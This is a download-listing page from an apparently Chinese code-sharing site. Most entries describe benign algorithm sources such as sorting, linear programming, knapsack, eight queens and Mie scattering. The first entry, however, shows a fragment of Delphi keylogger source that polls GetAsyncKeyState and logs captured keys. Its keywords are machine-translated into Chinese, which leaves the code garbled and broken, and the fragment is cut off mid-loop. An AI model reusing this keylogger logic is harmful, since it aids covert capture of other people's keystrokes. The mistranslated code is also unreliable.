-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
线性规划模型与整数规划
线性规划模型与整数规划
线性规划模型与整数规划
线性规划模型与整数规划-Linear programming model with integer programming linear programming model with integer programming
- 2022-05-16 10:11:30下载
- 积分:1
-
在 C 中的各种排序 implemnataion
快速排序、 归并排序、 堆排序、 选择排序、 壳排序、 冒泡排序、 插入排序 c 语言实现
- 2023-02-12 22:15:03下载
- 积分:1
-
Algorithm design in the 0
算法设计中的0-1背包问题,递归的应用
算法设计中的0-1背包问题,递归的应用-Algorithm design in the 0-1 knapsack problem, recursive application of algorithm design in the 0-1 knapsack problem, recursive application of
- 2022-02-26 18:53:13下载
- 积分:1
-
Super 8 after the algorithm, only a dozen lines of code derived entirely all sol...
超强的八后算法,只有十几行代码完全求出所有解,速度超快-Super 8 after the algorithm, only a dozen lines of code derived entirely all solutions, speed Ultrafast
- 2023-04-19 07:05:03下载
- 积分:1
-
H264 motion estimation in VHDL
H264的动态估计算法,VHDL描述,有详细的Readme文档,来自github。玩FPGA和SOC的可以试试。
- 2022-03-21 15:10:03下载
- 积分:1
-
Mie散射计算散射系数,吸收系数及不对称因子
Mie散射计算散射系数,吸收系数及不对称因子,采取的算法是最基本的粒子散射方法,应用了球形粒子矢量波函数展开推导出的适合计算机的表达式,参数包括尺寸参数,方位角度,具体参考随机介质中波传播与散射相关内容。
- 2022-04-20 08:07:04下载
- 积分:1
-
binary tree before preorder
二叉树的前序遍历-binary tree before preorder
- 2023-02-19 19:05:03下载
- 积分:1
-
OWL-S Editor用户手册
- 2022-05-16 12:52:49下载
- 积分:1
-
This is a publication by the University of Cambridge, a set of c language inform...
这是一套由剑桥大学出版的一套c语言的科学计算资料及相关的算法源程序,非常权威,这套资料对从事软件开发,科研计算等人都非常有帮助-This is a publication by the University of Cambridge, a set of c language information and related scientific computing algorithm source code, very authoritative, this information is engaged in software development, scientific computing, such as people are very helpful
- 2022-04-21 23:36:00下载
- 积分:1